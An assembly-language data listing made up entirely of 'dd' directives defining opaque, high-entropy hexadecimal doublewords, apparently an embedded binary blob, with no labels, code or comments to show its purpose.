dd 1211107Fh, 0FF719987h, 1BF31332h, 1FF719F2h, 0C83FD3FFh
dd 24232220h, 43ABFF32h, 69A12D0Ch, 2FFF2124h, 323131C7h
dd 0FFBABA33h, 0D1C41372h, 3D3C3B3Bh, 24B2A7FFh, 47A84665h
dd 0A8A9E85Ch, 4A1F5A34h, 4F4F8D5Fh, 22FE5150h, 0AA7110DCh
dd 5FA059BFh, 1AD23BD4h, 8A9CFD7Bh, 67806961h, 2F68482Ch
dd 29E321FFh, 0BF934AC4h, 759B72B0h, 77FF7675h, 5F3EF6EBh
dd 0FF7D0780h, 69DC8104h, 6E198B81h, 8AFF86B7h, 0E901FFA3h
dd 937B8BAAh, 7CFFB35Fh, 98979694h, 0C2FF17A7h, 0E5FF99B8h
dd 0ADFF816Dh, 0A8A64EE2h, 6FACAAA9h, 0CAAB8AE1h, 0B2C9B2E1h
dd 49527DD5h, 8BFFB31h, 1CBFCEBFh, 0C2C0FF28h, 4BFFC4C3h
dd 0CDB7ECA3h, 0FF80551Dh
dd 0D0A3CCBCh, 0D5D53BD4h, 2CD7D6FFh, 20FF9E56h, 0DF2BFF1Ch
dd 0E3E2E008h, 69FD3CE4h, 215CCA3h, 0EEFFBFEAh, 0D6B57FF7h
dd 0F61F0FFFh, 125A4069h, 363FFF9h, 0FE1688h, 0B3E80201h
dd 84DF418Bh, 0A750A76h, 0DE638FFh, 0FA2EDBDBh, 1514FF12h
dd 7D958416h, 0F4FF1F3Eh, 201F1E1Ch, 0FF67AD40h, 25CDD900h
dd 285609E5h, 192C51ECh, 0FF1A67FFh, 1CF638D2h, 60F23CD6h
dd 1A462BFFh, 0C34947AFh, 1C4BD6A3h, 4EBCFF6Ch, 7BEF53A4h
dd 54BCF803h, 5F585756h, 0A1781F68h, 0AD5DFEB5h, 78618941h
dd 0D9FFC6CFh, 0BF739B7Fh, 779FFF53h, 7890FB79h, 7CFC7B7Ah
dd 0A43BF101h, 0A549BF7Dh, 0FE45856Dh, 8C8A62A9h, 2DEF8E8Dh
dd 6FB6C4BDh, 0B75B2BBFh, 0F5F59A73h, 9F754EEBh, 21A16DBFh
dd 0FF81C02Eh, 64AA4CA2h, 0AD5E6A8Ah, 5BA587FFh, 5C937FB3h
dd 0F7FF0DB4h, 0FF98DD1Bh, 0CFBD55B9h, 0B3C0B429h, 2F2CC4F8h
dd 0C37C9C9h, 0AAFF40C6h, 0D03AD4EBh, 0FF3E2253h, 3236D8D4h
dd 36EC72D8h, 0FE27DCFBh, 5BFFE309h, 2C0268BCh, 0ED0316F6h
dd 0E8EFE2FFh, 0F0D7EC5Fh, 0F7FFF71Dh, 76E7F9F8h, 0DBFAD998h
dd 3FF0117h, 0BF8814C1h, 9E20C4Eh, 3884D513h, 9B397EFFh
dd 5DEB3251h, 0FF8D94A8h, 0DDBFB8h, 5F245021h, 0C05728FFh
dd 1C0EE02Eh, 99C2FFF0h, 0F735C6F2h, 0D2FF38C0h, 0A8B47039h
dd 0D29A3CD5h, 0E5FFF6F6h, 46C8699Fh, 2F5BCF56h, 8FDE5588h
dd 375C5AB2h, 0B7EFA6FFh, 678F1D25h, 808D69F4h, 6CFFBF68h
dd 540BE34Ah, 0FD70660Bh, 3BA740Dh, 0C90B0C7Bh, 7E7CFF94h
dd 0D7F807Fh, 79BFA0C7h, 0E38861FFh, 0FFFFC2E0h, 0FF78375Bh
dd 7A09DF97h, 9B9A9870h, 13219CFCh, 2FA584FBh, 2F8569FFh
dd 6658EDD6h, 4680CDF1h, 5A90FEBFh, 0E0D2FBB1h, 54B55DAAh
dd 25FF8C82h, 8DE6954Bh, 0C9FF953Fh, 0C5CB23E0h, 0E3CEB414h
dd 0FF74CEB7h, 30FF0219h, 37D828DEh, 0FFE185E1h, 0A26A21F8h
dd 0FFC614C3h, 14F6473Ah, 0FA1C12FFh, 0FF10DA34h, 3F23C051h
dd 0E05D26AAh, 0FF2F04ECh, 0EC85D108h, 0FFF1284Fh, 78FE1E64h
dd 0E6579532h, 2ECFFB7h, 0E826C8FFh, 0E42ACC06h, 2FC0FF0Ah
dd 0DB85FCD6h, 13FFFF33h, 373634DCh, 0EDB74D38h, 0FF39185Fh
dd 0AB7449E5h, 0AF7391FDh, 0B4A4949h, 0AFFC26Dh, 50BAAC6Bh
dd 0FF2B3C5Ch, 0C8592855h, 0B65CAD9Bh, 0D7505CFFh, 296C608Ah
dd 1865C61Bh, 6881FF71h, 84A3F080h, 0FF8C1672h, 0EDD17798h
dd 0FF88B934h, 727E907Ah, 0B171FF93h, 70D29B06h, 4DF3FFFh
dd 0FF72A9C8h, 5391634Eh, 947E9465h, 727A9DFEh, 76BC5698h
dd 80FF4AADh, 65A35160h, 0FF4CA650h, 0D2B98AABh, 0CCA1AF47h
dd 0DDB25BFEh, 0B45E3276h, 49789517h, 0BC54BBFFh, 27C0BFBEh
dd 0FA85064Fh, 0C83307C1h, 570CFFDCh, 3CFE4C8Ch, 0DC1089DAh
dd 8DFE10FFh, 0C3450B05h, 29B6ECFEh, 68515842h, 7415F107h
dd 0C254F1DFh, 83D58E5Dh, 0D9A2224Dh, 479162A4h, 0E2B58C6h
dd 8D680CC8h, 0E96BD101h, 0B3A0DC58h, 0C7245167h, 0A2426EC0h
dd 8341E15Dh, 6140FBB5h, 1EDCDF6Dh, 0FA620B59h, 936631C1h
dd 2015E5C5h, 5D6AC5B3h, 3515A3F9h, 3DC8E486h, 346CC004h
dd 6E47344Fh, 650B0FD5h, 8CA1D946h, 7F23363Ah, 8F57F731h
dd 4C5875D0h, 3B6B587Fh, 18B4C30h, 0E986DE6h, 0F601BCC4h
dd 0C0087004h, 0EC5C1276h, 0F4988A83h, 0AF0601C0h, 19A291Ah
dd 0D7B42D15h, 0A9278851h, 85238F2h, 0D275F240h, 6CBF035Ch
dd 0E4D1F2C1h, 0A07F9B1Eh, 0BE50590Fh, 0A03BBFC3h, 522A6BDCh
dd 0C5912004h, 76D2484Fh, 0EF0D5432h, 83FF0D8Ch, 442D6FABh
dd 1263EBCBh, 77C320BFh, 491FD04Ch, 178428C1h, 0B7FD2B96h
dd 0F3C1B3E0h, 5423B697h, 0F11B2027h, 241429D2h, 18DFCF57h
dd 0E667AF41h, 18E1A8C3h, 0D66E01C3h, 8E842D7h, 6E6B4BDBh
dd 2A56B70Dh, 9D93CDC5h, 0A8096481h, 34A86C3Dh, 341CEDDBh
dd 0AE06B1A8h, 0BE2D2545h, 0E5FB6648h, 9E1B2B2Fh, 0E5AC3D4Dh
dd 0C20D8Dh, 0B8A0DF9Dh, 0A4FE203h, 93436CC0h, 0CC8ADBF6h
dd 177CE808h, 18BC5A0Eh, 9E13A04h, 0EFB0763Bh, 0E5F5F51Ah
dd 37A06E0h, 315DA00Fh, 0DF23402Dh, 8D590032h, 0F52D4621h
dd 6C06D740h, 737543Bh, 0F463F6ACh, 7A561EDDh, 3EE6695Eh
dd 4C1E1548h, 1F1ADED9h, 3512A942h, 0C3040768h, 8FFB506h
dd 8D228964h, 1C920CD8h, 36697CD9h, 107A2601h, 7FE8908h
dd 0B9D9AD03h, 8B36446Bh, 0DBD0781Dh, 1835FFAh, 0CB03BDCDh
dd 1A8DCC89h, 0C727212Ah, 8DD8D462h, 56A4D913h, 7AE57436h
dd 2C09685Eh, 0B8F12B17h, 0D8BE06EBh, 0C7C3F1F7h, 1DD09231h
dd 0AAD64827h, 0FA07511h, 0BEEC837h, 44052B63h, 702DCE61h
dd 3AEBBAEEh, 0C6E6BE20h, 1A468243h, 0B3C38885h, 0FAC65C84h
dd 2133015Ch, 5B831057h, 8F64F069h, 0C0F75A02h, 1CC935EDh
dd 137E12C2h, 0D619015Fh, 52860C2Ah, 0A7030A63h, 0FF652376h
dd 8304704Dh, 0EED60342h, 15A24358h, 238811A5h, 617F7E41h
dd 0A01364D9h, 2E1B201h, 546658D0h, 0F566A3Bh, 0CD296AA0h
dd 16A3733Ah, 0F5AB173Ah, 0AD31615h, 1425050Bh, 0BC5F088Dh
dd 0E790C257h, 86753476h, 9160132h, 74E3182Dh, 27598535h
dd 0AB4EF8FFh, 1E4CA2BBh, 90D068FCh, 6057EFF9h, 28033EA8h
dd 69B3E861h, 0B1026A67h, 0B3B10D2Ch, 29F08C6Ah, 0F75AF9F4h
dd 0D8048112h, 2F07B4Bh, 0CF01DD73h, 6E8710F6h, 33B7B16Dh
dd 16389D9Dh, 9B30E31Bh, 1CEF4958h, 31B7DB88h, 0E39003h
dd 0D474660Fh, 0E81CB952h, 9040251Eh, 16B1ED23h, 0C415A1E0h
dd 27018044h, 49ED0309h, 0EA045708h, 49F79FDh, 0C93B18F8h
dd 0B43EB32Eh, 0C2A609EAh, 0D31AA084h, 24202521h, 0C2CD3010h
dd 74D1A107h, 541B5803h, 0BEFE87Fh, 65440000h, 0E8EE05CEh
dd 12170000h, 582605Dh, 0E8BB11AAh, 0FFFFF7E3h, 0A001EAFFh
dd 0FFEE20E0h, 0A090806h, 2A498366h, 12FBF3FFh, 0FE2471F5h
dd 5318FF14h, 664D18F2h, 0C3521D69h, 67BFC3D5h, 0D1E7B82Bh
dd 28C2FF28h, 2CC60CE6h, 0D9FF675Dh, 35343333h, 0FF7CB881h
dd 0CBFAC61Dh, 0F93DD53Dh, 0B68397FFh, 9345AE44h, 0A298F49Eh
dd 0E6F4C4Ah, 0D415DF08h, 0E8FAF76h, 0FF3FD74Ch, 5CB55978h
dd 886EF7D1h, 763066A1h, 0FA4D2CECh, 5F626E80h, 91E10E17h
dd 0BE86B2D4h, 2B0C74E5h, 0FF0E86C3h, 0FA8305AEh, 876FC383h
dd 0F2A74BFFh, 3D8AF18Ah, 2E8DFC66h, 63535585h, 7FB85AD9h
dd 9D761E94h, 0F6FFA8D6h, 0DC59A049h, 0D55B6639h, 0FBD42A9h
dd 0BA94AEADh, 91B79672h, 0D487910Eh, 0ACBFC9BCh, 0E608C628h
dd 0C93AFA06h, 119F9D9Dh, 0EDD5910Eh, 0A7BBF1DBh, 0DFDEDCFBh
dd 7F5D9EE0h, 0E50DE1C0h, 0E56C5EAh, 35FF5C33h, 0C36F605h
dd 0F9FF11F9h, 0FC82A705h, 0FA83007Dh, 778077Fh, 5A8374Ch
dd 0FE7FF54h, 13FBD27Dh, 68FFE81Dh, 76166B16h, 0C06C196Fh
dd 0E7FAA1Dh, 0FE61ABBEh, 2A5ADB02h, 0DF612A59h, 0F0AB1FFFh
dd 0DF33FFC1h, 15BF2A37h, 0C4D5C571h, 0E80EA3C3h, 4343A97Fh
dd 42404544h, 0B66DFF8Bh, 4F324F35h, 53BBFF30h, 57BFD3CCh
dd 0B3F8FD59h, 0A05CA65Ah, 1C900E27h, 2AE22AFFh, 0D5B08C4Bh
dd 0EB97387h, 0A91A57BBh, 85A47437h, 0F780F0FFh, 8A6C5A84h
dd 60E3FA3Fh, 9FF2828Eh, 0FF957B0Eh, 1C979695h, 98BFFE14h
dd 90FF0E46h, 0A3A349E6h, 0B9FEA5A4h, 0AE8DCC2Ah, 21DEAE40h
dd 0DACAB3D5h, 0E3B2759h
dd 0B8E852D2h, 30DF0BB4h, 0C02AB3B0h, 2E11CCFFh, 21DF1DC4h
dd 0CCCBFFCBh, 0B4420ECDh, 38FFD6F5h, 3FD8DAD6h, 0FFDAD9D9h
dd 9A52B1DBh, 10201CFBh, 7F7AE381h, 0EA03B8E9h, 0BFF7B28h
dd 8542ED06h, 0FFF21A77h, 53F6F5F4h, 7DEBD77h, 0FEFC14FFh
dd 8DA500FFh, 0F920E247h, 3C735DEDh, 0A5EC4A8Fh, 0E1CEC1F0h
dd 0EDEB0E6Fh, 0F0792FF7h, 51FD1Eh, 0DC28439Fh, 973F0E4Bh
dd 2F53ED90h, 3FCCA546h, 0C0413642h, 0E3FEC36h, 0E1C1013Dh
dd 0FFB2839Fh, 6AE7F6B9h, 35DD891Fh, 0FF57BB76h, 58FFB0F2h
dd 705C5B5Ah, 0FF443BD3h, 64628A65h, 0E7666665h, 974E2DFFh
dd 7B616F87h, 972C60Ah, 85B4DB02h, 0EF7AFF93h, 7C9622D3h
dd 69FF1B65h, 85848383h, 0FFCC0893h, 86E176ADh, 0E98CF6D7h
dd 0EB9E90FEh, 4697EC97h, 0A640EACh, 1FCC5FF0h, 23F57C0Eh
dd 2F538AE9h, 2C7A9A0Eh, 987AFF6Fh, 0C4B9FFC7h, 4E7FC7BDh
dd 0C3FF29C0h, 81C5C4C3h, 0FFED8C48h, 0CD3E0A36h, 2FDFCD25h
dd 9BD039F9h, 3019F5F6h, 0B9E00AFFh, 0FFE70DB1h, 9AE9E8E7h
dd 0EAC98866h, 0FEF204FFh, 0F506328Eh, 35F5FF1Dh, 82E8FBD9h
dd 0FEC681FEh, 0C2FFFF87h, 0F3C7CCB8h, 0F9FFC808h, 0E0CE40Bh
dd 0FF63100Fh, 0E930579Dh, 1863146Ch, 1DFF1156h, 871F1E1Dh
dd 7FF46ACh, 56255520h, 0FFC1C029h, 0C5E02329h, 0DA213F2Dh
dd 0FCFF328Dh, 5DB57536h, 0E16F3F1Eh, 0F8AB0B3Dh, 0AF638F43h
dd 0A1C15F46h, 0A98948A2h, 8275B5A6h, 9E0E6F70h, 578DBD74h
dd 6959FFFFh, 0A27918D4h, 61FF61B7h, 0EA6A6362h, 0FE944322h
dd 6F646882h, 39B15E6h, 749CBC0Eh, 726B7776h, 81587FA3h
dd 6A808BBFh, 602681FFh, 49846DC1h, 0DD1A85EBh, 0FF67E10Bh
dd 93929191h, 0B3D21A1Ch, 2A7164DBh, 189DFF9Ch, 5E85E410h
dd 0D4FFA7D3h, 0AB4373A7h, 0FF4744A5h, 7BABD8AEh, 0B4B3B359h
dd 3830B5FFh, 50469DFCh, 4BFFFFBEh, 0B22BC254h, 0C5C5C52Bh
dd 845BA1C6h, 8DC8EF71h, 0E59A3FFh, 0FF4C66E7h, 0AE1121Eh
dd 0E6E5E4E2h, 0AD67E4FFh, 0B9BC17CEh, 1BEBFF84h, 1FB5FDF3h
dd 0D7FF3BF7h, 0ED37FA13h, 0F10F3CE8h, 7B0278FFh, 0E8F8068h
dd 13E4949Bh, 348AEDFFh, 0D71917FFh, 651AF066h, 0E1A01D1Ah
dd 23C90BDFh, 25FC2423h, 0D4CAA50h, 0A21D6F2Eh, 32FFC456h
dd 374112FCh, 0F83D3746h, 3A4D3A4Eh, 0FF0E2604h, 174C40AAh
dd 493A4539h, 49A17DEDh, 4F26FFA3h, 0BB525152h, 0FF4B5555h
dd 3ED4FF18h, 0AA9C587Fh, 96CBA15Fh, 0FB8C6A62h, 0FF0867FFh
dd 0CE0C709Ah, 0D2A8759Eh, 7A92DAFEh, 577E7D7Ch, 37A69996h
dd 0FE9E8616h, 8B610239h, 978D8C8Bh, 0FFB5F468h, 31977896h
dd 9A734A8Fh, 179362E0h, 0FF630E18h, 0EC28F010h, 1DBF568Dh
dd 0B14797A2h, 0B3B2FFB1h, 93F23A39h, 0B9EDC544h, 858FBDC6h
dd 0C2FF96BEh, 0E2814B73h, 0FFCAB43Bh, 262ECAB7h, 86D2C0CCh
dd 19D139FEh, 0D8D63EF5h, 531CFF17h, 23FA99FFh, 8E21321h
dd 380CE3E7h, 4A79FF42h, 8579D257h, 0FC1A1257h, 0E6DE82DBh
dd 8AE6FE7Ch, 72A50BD2h, 720505FFh, 6D087D04h, 0DFEC0CAh
dd 0DFC50E7Ch, 1B1A18F0h, 91F8FE1Ch, 0CADD045Bh, 26FFDF22h
dd 0FF4DA5A0h, 2CC42F0Eh, 0BC302F2Eh, 1077BDFEh, 3836DEC9h
dd 0B15A84DFh, 3BF41A59h, 0BF4240A8h, 3C998FFh, 8BE1B56Ch
dd 7FFF4CBDh, 1AEAB40h, 976F95ABh, 0FF2E5B21h, 5E2EDC5Bh
dd 8AD85E2Dh, 723260C6h, 43A164D0h, 851D5BFFh, 706F6FFFh
dd 10FE7771h, 9C72FF51h, 0CB5B197Bh, 0E85B8CBDh, 944BFF82h
dd 8685856Bh, 4FFD187h, 4C88AFEEh, 0E27B8F79h, 1FF30793h
dd 0ED159E0Eh, 0A561B8DFh, 0FF21AFD6h, 24EF03FCh, 0FF6FA94Fh
dd 0FB22E7ABh, 5A4C8BEAh, 5D7534B0h, 0FEFFADB7h, 99F834FDh
dd 0BFC15742h, 48F3C3FFh, 0CCF4E3A2h, 0BFCA2291h, 5FCFCEFFh
dd 2FFFF695h, 9804D63Fh, 0FCD83265h, 0DC36FC16h, 0E176CD0h
dd 5A73FAC8h, 88F58B7Fh, 0C3B26F9h, 0FD16FCFFh, 0EA8331BEh
dd 504FF02h, 4D87D206h, 0FF18F72Eh, 0FE9D86D6h, 0E4D71130h
dd 2A37D818h, 11FF1FF7h, 57225442h, 0FFCE3422h, 0C21B2824h
dd 0A6266B29h, 0FFFDFF1Bh, 41304611h, 8F386134h, 343C76FFh
dd 0B22A6A8Bh, 5A7BFF14h, 396226C3h, 61FF8AC4h, 0C4BA3E03h
dd 0FF34A305h, 0D16303DAh, 58DE5987h, 0FFFF5CA5h, 0B4A195DFh
dd 8B42AC62h, 0EB676597h, 4F2EE6FFh, 1A6D1990h, 995EF871h
dd 171E7B71h, 966D61FFh, 0BF176DA7h, 6AD28175h, 86C6FF82h
dd 0AECDFF80h, 438F6777h, 6751EBAFh, 4019FF92h, 0CC0E3CC4h
dd 0A55A66D8h, 0FE33560Eh, 917DAD45h, 0FF37B25Ah, 35FEC2B6h
dd 7DBF9EDDh, 0FFC6BE4Fh, 3A087F22h, 9AFDE5CBh, 96D9A9DAh
dd 0CFFF6ED4h, 1DFF3760h, 0DF30FFA3h, 0B3C55B6h, 0C3FF2FE3h
dd 0E691E692h, 1AE8023Ch, 0D1FF171Dh, 332FC671h, 0F51EFF63h
dd 12DA5746h, 0FDFCFFFAh, 658D39FEh, 0EFFF0726h, 0E0A20907h
dd 0FC0B0A08h, 6B83200Ch, 0E471534h, 5D9716FDh, 0FFDFE73Eh
dd 59225A0Bh, 0E4B1F822h, 17C327D5h, 27283F2h, 0AB35E0FFh
dd 7F23FFC6h, 6072BD5Dh, 0FFFF3F8Fh, 4747ADC9h, 0C6D94948h
dd 4A6928FFh, 0BB5E52A4h, 5A56FFB8h, 745BBCFFh, 2AF80AD1h
dd 9F5E295Eh, 44AEFF5Fh, 67B792A4h, 0FFB17659h, 54C96E87h
dd 7383B021h, 1FCFFF48h, 47DFA95h, 0DF80FCFDh, 8B6C06E4h
dd 0B304DB20h, 7B8A81FFh, 0E1C0E61h, 4A270E21h, 0A6FF1BA2h
dd 0ED270DFFh, 8DC6578Eh, 0B244FEF7h, 0B6589CBEh, 0FF1205BAh
dd 0BBBAB9B9h, 9BDA30FAh, 3400C4FDh, 2FC42CC3h, 475EC8FFh
dd 0C9E8AFF9h, 0D27FCE26h, 0F2B15945h, 0DB33FFD3h, 2A1D6F39h
dd 0E3F034DEh, 3794A809h, 0EB0309FFh, 45CBFF0h, 0F0FFBBECh
dd 0D07F5DD4h, 0F8F61EF1h, 713D6FF9h, 0FB8BDA99h, 23CF7670h
dd 93C3E0FFh, 2BC7FFDCh, 5FA0FF23h, 15FCFDFFh, 1AF29C06h
dd 0AD55BF1Ch, 0E0270645h, 5F5EE2A7h, 0C38926FFh, 0FF2D8D2Dh
dd 56BCFDFBh, 71563017h, 0E5F4573h, 4B0F1DEh, 0DD2EBE65h
dd 0E23B171h, 4EA0547Eh, 0FFEA12F6h, 0DCFF47B6h, 7F1EFFD6h
dd 485CB6A0h, 63C089D8h, 0DCFFBF63h, 6E4D0CEAh, 0F2E5FF12h
dd 52BCCD56h, 0FA6A420Ch, 7D93D278h, 3C7FFF5Fh, 0A7C4E60Ch
dd 900E3D80h, 6F380E02h, 0E3FF47D1h, 0BFDEE916h, 0BF41FF60h
dd 0EF63C8F7h, 0D9FD9DF3h, 2FA6E10Ch, 25A900D3h, 0D12919FFh
dd 35FEC8BFh, 0E2BCCCCEh, 71C8C0B3h, 0E30E4FFFh, 0EB8A42FFh
dd 0ACD1AF2Ch, 25118BD5h, 31F9157Fh, 0FFB6FCD9h, 0E09DDCA2h
dd 94E793B7h, 0FF4CE7DBh, 0FA4A910Bh, 0D0B77D75h, 0FF0E0D09h
dd 0FD8CF98Fh, 0E9FC1586h, 0C296E1F8h, 0FFB105F6h, 6981CAFFh
dd 10F80B2Ah, 1413FF12h, 3C539976h, 19FFF1E5h, 54973107h
dd 0FFD7E0CCh, 0EB27CF23h, 2A28C007h, 0AC2C2BFEh, 35144BA3h
dd 0D97EFF04h, 0C71E7DB7h, 9AF1695Ch, 88A77BDEh, 0FFC42DBFh
dd 0B863DD4Fh, 54535250h, 13D948FFh, 5820A57Ch, 775CFF27h
dd 897B63B4h, 67FF8F4Fh, 6A8347ABh, 0FF7B7553h, 34606C86h
dd 0A6B7719Ah, 759DA1FFh, 78060DADh, 877CFE01h, 0C9298394h
dd 89788DA2h, 6573FF83h, 64A27C6Eh, 3257B093h, 73235FFFh
dd 0ED52959Bh, 54539F77h, 0BAFDA3FFh, 3492A74Fh, 0D3AAFFD0h
dd 0AD4692AAh, 0E98CFAA2h, 0FDC15BFFh, 7F479EC4h, 874D4F0Eh
dd 2D39E0FFh, 21BEC7C5h, 62C3FBC9h, 1D03A0Fh, 3DF41E7Eh
dd 0FFB7D7D7h, 0B8FE56C5h
dd 0E234DAF9h, 25F0BAFh, 0FF50653Ah, 0ECABEBEDh, 84E0EC06h
dd 0F3F319E5h, 0BC782CF8h, 1D3406DDh, 214C82Fh, 0E822E2CCh
dd 0ECE15F06h, 8B0FEA0Bh, 0EB76FF79h, 1630FF94h, 1D3CA56Eh
dd 5A81FFDCh, 3D97284Ah, 57FD2050h, 29CF7624h, 97FFBF29h
dd 0CC0B6AA2h, 3C30DAFFh, 0B035DEEFh, 0D23EE10Bh, 3E7FFF3Ah
dd 6605CF7Bh, 44ACE3BFh, 77FFF46h, 49682FC7h, 50BFF68Fh
dd 0FCFF53B9h, 3CDA0B55h, 5E861B7Dh, 0FF36E14Bh, 0E84888B0h
dd 6F364C97h, 7A3969FFh, 47792C62h, 1654A93Fh, 5375007Fh
dd 0FF78769Eh, 0F3797A79h, 68835A39h, 0B48280C4h, 0A5BF29FFh
dd 88F28DACh, 388CFEF5h, 7991624Eh, 85368D91h, 98E8B1E8h
dd 0D15F7306h, 2E609F9Eh, 5887E6FCh, 1DA75464h, 44FFAFFFh
dd 0B0AFAEACh, 0FFF73DB0h, 0B55D4990h, 0B8518520h, 0A62728FDh
dd 1BBEC3C1h, 0C7F02F47h, 12BC5D7Dh, 88FEC126h, 9076B7FFh
dd 0A12AFDF1h, 0BCDBAEDBh, 0F5D1211Bh, 0CA216393h, 9360542Fh
dd 1617D018h, 737FF8Dh, 0BF7F00Eh, 21FF6E02h, 0BF43D1EFh
dd 0E9C40101h, 97840B01h, 424467FFh, 33DFE0FFh, 1103FFE8h
dd 0E33B9FFFh, 0CD24FFD1h, 29282727h, 48FFA686h, 33532A09h
dd 0F9A0334Ch, 0DF36C5F5h, 6A3B7F39h, 441B5AB0h, 4B88FF4Dh
dd 0D0A248E1h, 0C2560EFFh, 56C07534h, 5731BF25h, 555BB3F0h
dd 6CDA7EAh, 0E94CEFh, 64FCF62Bh, 896436FFh, 9A641426h
dd 4F34988h, 48D113D1h, 95D3047h, 880CB113h, 9378CE58h
dd 8105023h, 0DC43F559h, 0A22E7D53h, 74417B8h, 51EACF07h
dd 0DB787DB5h, 8F458AC7h, 0F1E0D858h, 62C2B00h, 0FF08AE06h
dd 0CB9ADh, 0FBA0040h, 16B80BDBh, 0FF51F7FAh, 0D571BED0h
dd 8CB98DEh, 0AE8A1F41h, 525F2B4Dh, 5AB610D4h, 22F05785h
dd 8745FED4h, 8967F021h, 9797AB64h, 10801431h, 0A223F4C0h
dd 0CACDDD5Dh, 0B710023Fh, 0C04F844Dh, 0C7A5207h, 0EFE44337h
dd 0B88C038Fh, 5F464F7Ch, 1C1376ECh, 0C0023B38h, 0ABFCE056h
dd 0AF0604E1h, 2B6006EEh, 0D403CFB6h, 0D0726501h, 8B62363Dh
dd 4E770372h, 0A80F6D6Fh, 5F63E078h, 0D88413C0h, 0ADF85A35h
dd 0B580144Fh, 4DBDA0E1h, 1A126C0Eh, 10600F76h, 28098830h
dd 0FE03ACDBh, 839FEDBEh, 0BBC39028h, 95260945h, 60B43002h
dd 1323941Eh, 33AF5B6Dh, 24F782E1h, 4DC3964Ah, 0B4538344h
dd 3BE2C7Dh, 60EA3072h, 1537B3C1h, 0CA038C92h, 2818EA2h
dd 0A9017324h, 77C9080Eh, 614E2BB0h, 1F0ECFFFh, 0E8B77803h
dd 0B87B1BAFh, 66F44Fh, 86DFCE68h, 0F14F5212h, 8B4E0977h
dd 0FF64120Ch, 69D8DB51h, 0FF2667D9h, 8AF76951h, 6656274Eh
dd 236851E9h, 65105B23h, 3308AAB7h, 4E037E86h, 3129EF67h
dd 0B18ACAF3h, 0F99D096Ah, 0C57517BBh, 0D70F3D1Fh, 9332158Dh
dd 0F5E1401Fh, 7F758AAAh, 28F9C569h, 0E5EC69E4h, 0F6253A67h
dd 4D491675h, 0BA1FFF1Fh, 9EE6EA51h, 0F68332B1h, 0D14FBBD0h
dd 1B65D884h, 0F63B9AD9h, 3638D812h, 74AC97Bh, 0DB69DAFEh
dd 8DD7C67h, 19BD125Ch, 0BB57EF3Ah, 0AC053704h, 4DBFF52h
dd 0ADD80108h, 0FBD936EFh, 402D377Ch, 42B109B1h, 8C786D4Ah
dd 93B30D8Dh, 0DF248521h, 0BB270935h, 9255F05Ah, 5E4FBDFDh
dd 8F656564h, 0A21C6974h, 0B21F32B1h, 786F2914h, 69E2FB3Dh
dd 217167E3h, 0F76EAB72h, 0DB896239h, 0C21C9ED8h, 0C20C0F65h
dd 6366B60Bh, 7967C910h, 0D91B199h, 6C7968B2h, 0A89B0958h
dd 0DBF73D32h, 9E020D8Dh, 0C6647E2Fh, 0DB7FCB0Dh, 0BB394F84h
dd 684031DBh, 0FCB5AE86h, 595B996Ah, 0F82FDF32h, 415C2868h
dd 0FFFABEBEh, 0D01BE8E0h, 0C0BF2BCDh, 136E805h, 0E202D00Dh
dd 0A3570D98h, 58CD1DA7h, 36A17BDh, 0DD08BF59h, 0B88F0148h
dd 0AF411B77h, 78AB8EF3h, 0B8EC0FF7h, 0AB604A55h, 91FABA5Fh
dd 9C330FBh, 6C61D3ABh, 89730630h, 89BA7E20h, 0F0F7C200h
dd 7AAB58E4h, 62024146h, 65175A44h, 0FFA9FFAEh, 85BF55B2h
dd 0BAAFAAACh, 0AFBDF0ADh, 9115FFB2h, 0F08D1399h, 4CF295h
dd 13478551h, 0BDBD8B9h, 283C5461h, 1F731144h, 0C1BA10Eh
dd 16786EE0h, 0D69FA4B0h, 0E0331D26h, 0F0FA45ECh, 4937804h
dd 0E78D676Eh, 12B236C4h, 7E2A4852h, 0D14D1B58h, 94B324C9h
dd 2E8D988h, 0E0173311h, 1F8D02Bh, 0DB4B32A3h, 4D88991Eh
dd 4910DD87h, 0ED22B02h, 60BC12D9h, 9F9ACF18h, 4A2B7B7h
dd 75B1FF98h, 0C1B08813h, 0D0BC50D8h, 143FCBD4h, 6170DB61h
dd 0EF873521h, 542C3788h, 520A8790h, 0E28A5805h, 3E9FB056h
dd 50B129BEh, 0F1CD9222h, 9210AA1Ch, 1AFF042Dh, 91DE248Ch
dd 0C4958100h, 5E030260h, 12C6D270h, 72B02283h, 0C391BFC0h
dd 0E01EADAh, 5DDB99A9h, 0E7E29D05h, 0E9BFF35h, 56FB59CEh
dd 0F237B8Ah, 0E997608h, 269F617h, 0DEFD0858h, 0B78E0049h
dd 0AE401BDFh, 77AEAAF2h, 54B7BA29h, 0AA0D00B7h, 0F10A765Eh
dd 0C230FB90h, 6383BD09h, 68E2FFEh, 0EC6F1F88h, 0DD94FF88h
dd 6358EFF6h, 57FF8EFFh, 0FEAA11E7h, 0A2A2FFFEh, 0AAB0A2D0h
dd 0B646BBB5h, 3BE25BDh, 0F0C0AF55h, 0BD026DDFh, 0E7BB4F28h
dd 0F6CCFF4Ch, 0FB23438Eh, 3CCCDD15h, 11A9B11Bh, 0EF2B192h
dd 5B7B328Bh, 0C9115803h, 547A295Fh, 7E1238ACh, 23638C82h
dd 0F1C07F03h, 94FB8CFFh, 0FFFF5012h, 0CF4D262Dh, 89E70E1Ah
dd 768675h, 93212E9h, 16F57F7Bh, 0BB03EDADh, 1DF7C2A8h
dd 7BEE1963h, 171B095Ah, 0C909D823h, 370F361Ch, 0D817023Eh
dd 290EC634h, 0B2AC87CDh, 1C986F0Dh, 0FD7C637Dh, 6B9677Ah
dd 8D5812B7h, 0EFF6C06Eh, 5BF24AA3h, 0B6DBD904h, 0BAD919B3h
dd 0C61B732Eh, 3EFF0A30h, 7A0279h, 0B30E04B1h, 0EB34DF8h
dd 4D26BFA2h, 78A50277h, 273FBDFh, 13690074h, 2FF7FD1Bh
dd 70B34E6Bh, 9E49EC08h, 0BB611BECh, 432F0F00h, 2DFE10C2h
dd 191AA77Bh, 26D2C71Bh, 0CF23F019h, 6CF1517Fh, 2B7E027Dh
dd 7CEC04EDh, 25E9611Bh, 3DDA306h, 118C3FB2h, 6A3583BEh
dd 361C1464h, 0EB1EF821h, 1B1AD90Ch, 0DC2652FFh, 9E09C9h
dd 0B80AC648h, 27B39FFh, 52B7007Ch, 0BFCA9B3Ah, 0C0DEE277h
dd 0D891F386h, 0C21F18F2h, 0A57C4650h, 0E8206E0Dh, 0A90321DDh
dd 28F4C0C3h, 0F8E20A77h, 0B180330Bh, 0EF84AE80h, 0F2C07BC9h
dd 8B1913FFh, 6D840EF5h, 0E4D8FE1Eh, 34F2B65h, 9A766547h
